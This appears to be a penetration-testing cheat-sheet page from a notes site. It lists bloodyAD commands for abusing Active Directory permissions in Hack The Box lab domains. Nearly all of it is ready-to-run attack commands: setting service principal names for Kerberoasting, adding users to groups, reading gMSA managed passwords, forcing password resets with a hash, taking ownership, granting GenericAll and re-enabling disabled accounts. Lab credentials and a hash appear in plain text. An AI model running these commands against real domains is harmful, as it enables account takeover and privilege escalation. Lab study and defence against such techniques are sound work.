BloodyAD

for WriteSPN

└─$ bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u henry -p 'H3nry_987TGV!' set object 'Alfred' servicePrincipalName -v 'anurag/htb'
[+] Alfred's servicePrincipalName has been updated

To get the writable object

bloodyAD --host dc01.tombwatcher.htb -d tombwatcher.htb -u henry -p 'H3nry_987TGV!' get writable --detail

OR

bloodyAD --host dc01.tombwatcher.htb -d tombwatcher.htb -u henry -p 'H3nry_987TGV!' get writable

OR

bloodyAD --host dc01.mirage.htb -d mirage.htb -u 'Mirage-Service$' -k get writable

to add/remove to the group

└─$ bloodyAD --host $TARGET -d $DOMAIN -u $USER -p $PASS add groupMember Infrastructure 'Alfred'
[+] Alfred added to Infrastructure


└─$ bloodyAD -d $DOMAIN --host $TARGET --dc-ip $IP -u #USER -p $PASS remove groupMember "Protected Objects" "IT"[-] IT removed from Protected Objects

to read GMSA Managed Password

└─$ bloodyAD --host $TARGET -d $DOMAIN -u $USER -p $PASS get object --resolve-sd 'ansible_dev$' --attr msDS-ManagedPassword

ForceChangePassword

└─$ bloodyAD --host $TARGET -d $DOMAIN -u $USER -p :$HASH set password sam 'P@ssw0rd@123'

Change the owner

└─$ bloodyAD --host $TARGET -d $DOMAIN -u $USER -p $PASS set owner john sam

Give GenericAll rights to the user

bloodyAD --host $TARGET -d $DOMAIN -u $USER -p $PASS add genericAll John Alfred

To check if the user account(UAC) is disabled or not

└─$ bloodyAD --host $TARGET -d $DOMAIN -u $USER -p $PASS -k get object $USER_TO_CHECK --attr userAccountControl

to remove the UAC

└─$ bloodyAD --host $TARGET -d $DOMAIN -u $USER -p $PASS -k remove uac $USER_TO_CHECK -f ACCOUNTDISABLE

set SPN

└─$ bloodyAD -d vintage.htb -k --host dc01.vintage.htb -u 'GMSA01$' -p 5008d30496b4c5069ce1fc187b5b5960 -f rc4 set object svc_ldap servicePrincipalName -v 'http/whateverldap'

PreviousActive Directory NextWordpress

Last updated 6 months ago